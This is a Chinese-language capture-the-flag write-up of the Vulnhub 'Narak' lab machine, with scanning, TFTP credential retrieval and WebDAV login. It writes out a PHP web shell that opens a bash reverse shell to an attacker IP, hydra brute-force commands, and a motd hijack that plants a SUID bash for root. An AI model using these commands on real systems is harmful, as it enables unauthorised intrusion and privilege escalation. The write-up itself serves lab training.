Vulnhub narak

kelec0ka發表於2024-12-03

0x01:埠掃描

主機發現

nmap -sn 192.168.231.0/24

image-20241203152356425

全埠掃描

nmap --min-rate 10000 -p- 192.168.231.143

image-20241203152442524

22ssh,80http

UDP掃描

nmap -sU --top=20 192.168.231.143

image-20241203182921535

有兩個埠開放

詳細埠掃描

nmap -sT -sC -sV -O --min-rate 10000 -p22,80 192.168.231.143

image-20241203152847896

漏洞掃描

nmap --script=vuln -p22,80 192.168.231.143

image-20241203153307540

0x02:tftp滲透

剛才我們掃描到UDP可能開放的埠為68,69

我們試試tftp埠是否開放

image-20241203183146578

成功進入

因為tftp本身沒有內建的列出檔案功能,所以我們隨便get一個東西看報錯返回就能知道里面有什麼檔案了

image-20241203183310425

看來他做了遮蔽

在下面的web滲透裡從tips.txt裡得知了檔名為creds.txt,我們get下來

image-20241203184336658

拿到一串憑證yamdoot@Swarg

拿到憑證首先嚐試ssh

image-20241203191005395

0x03:web滲透

先掃目錄

dirsearch -u http://192.168.231.143
gobuster dir -u http://192.168.231.143/ -x rar,zip,txt -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt 

image-20241203154425146

image-20241203183223676

掃到一個/tips.txt,看看

image-20241203183833916

這提示我們了一個檔名為creds.txt,應該就是tftp裡的,把這一段放到上面去了

/webdav有一個登入框

image-20241203155311864

用我們剛才tftp滲透拿到的憑證嘗試登入

image-20241203184513641

成功登入,但沒有任何檔案

上網查了查webdav這個webapp的利用,我們可以使用davtest檢視webdav的基本資訊,用cadaver連線webdav

我們首先用davtest檢視

davtest -url http://192.168.231.143/webdav/ -auth yamdoot:Swarg 

image-20241203185418914

發現可以執行php命令,現在我們連線webdav傳馬

注意,我們這裡不能透過antsword連木馬反彈shell,因為這個網站的此目錄本身是無權訪問的

cadaver http://192.168.231.143
<?php exec('/bin/bash -c "bash -i >& /dev/tcp/192.168.231.138/4444 0>&1"')

image-20241203190759144

image-20241203190813540

我們反彈shell

image-20241203191713150

0x04:許可權提升

提升tty

python -c "import pty; pty.spawn('/bin/bash')"

沒有python,換成script

script /dev/null

檢視使用者

cat /etc/passwd

image-20241203191812883

發現了3個使用者

檢視可寫檔案

find / -type f -writable ! -path "/proc/*" 2>/dev/null

image-20241203192139477

看到了這幾個可以檔案,先看hell.sh

image-20241203192350491

得到一串brianfuck,我們破解

image-20241203192844222

懷疑是密碼,我們試試

hydra -L user.txt -P pass.txt ssh://192.168.231.143 

image-20241203193117027

我們橫向遷移

image-20241203193438887

剛才我們檢視可寫檔案看到了motd,懷疑是motd提權,先看它有沒有root許可權

image-20241203193609940

好的,我們寫馬反彈root許可權

image-20241203195013450

0x05:反思總結

1.發現神的部落格是用cewl生成字典去打的webdav

cewl 192.168.231.143 -w 1.txt
hydra -L 1.txt -P 1.txt 192.168.231.143 http-get /webdav

image-20241203195538838

2.motd提權除了反彈rootshell之外,還可以將我們的bash替換成root的bash

image-20241203195839675

echo "cp /bin/bash /home/inferno/bash && chmod u+s /home/inferno/bash" >> /etc/update-motd.d/00-header
./bash -p

image-20241203200631243